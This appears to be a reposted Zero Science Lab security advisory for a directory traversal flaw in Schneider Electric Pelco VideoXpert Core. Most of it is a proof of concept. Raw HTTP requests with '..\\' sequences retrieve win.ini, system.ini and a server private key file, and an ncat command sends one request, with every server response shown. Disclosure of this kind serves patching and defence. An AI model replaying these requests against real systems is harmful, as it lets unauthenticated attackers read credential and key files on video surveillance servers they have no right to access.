扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 |
Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: 2.0.41 1.14.7 1.12.105 Summary: VideoXpert is a video management solution designed for scalability, fitting the needs surveillance operations of any size. VideoXpert Ultimate can also aggregate other VideoXpert systems, tying multiple video management systems into a single interface. Desc: Pelco VideoXpert suffers from a directory traversal vulnerability. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server. Tested on: Microsoft Windows 7 Professional SP1 (EN) Jetty(9.2.6.v20141205) MongoDB/3.2.10 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2017-5419 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php 05.04.2017 -- PoC: ---- GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1 Host: 172.19.0.198 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close HTTP/1.1 200 OK Date: Wed, 05 Apr 2017 13:27:39 GMT Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT Cache-Control: public, max-age=86400 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding ETag: 1247548162000 Content-Length: 403 Connection: close ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] 3g2=MPEGVideo 3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo ------ GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem HTTP/1.1 Host: 172.19.0.198 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close HTTP/1.1 200 OK Date: Thu, 06 Apr 2017 11:59:07 GMT Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT Cache-Control: public, max-age=86400 Content-Type: text/html; charset=UTF-8 ETag: 1491397116000 Content-Length: 9 Connection: close T0ps3cret ------ bash-4.4$ cat pelco_system_ini.txt GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1 Host: 172.19.0.198 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close bash-4.4$ ncat -v -n 172.19.0.198 80 < pelco_system_ini.txt Ncat: Version 7.40 ( https://nmap.org/ncat ) Ncat: Connected to 172.19.0.198:80. HTTP/1.1 200 OK Date: Thu, 06 Apr 2017 12:30:01 GMT Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT Cache-Control: public, max-age=86400 Content-Type: text/html; charset=UTF-8 ETag: 1244668084000 Content-Length: 219 Connection: close ; for 16-bit app support [386Enh] woafont=dosapp.fon EGA80WOA.FON=EGA80WOA.FON EGA40WOA.FON=EGA40WOA.FON CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON [drivers] wave=mmdrv.dll timer=timer.drv [mci] Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds. bash-4.4$ |
体验盒子
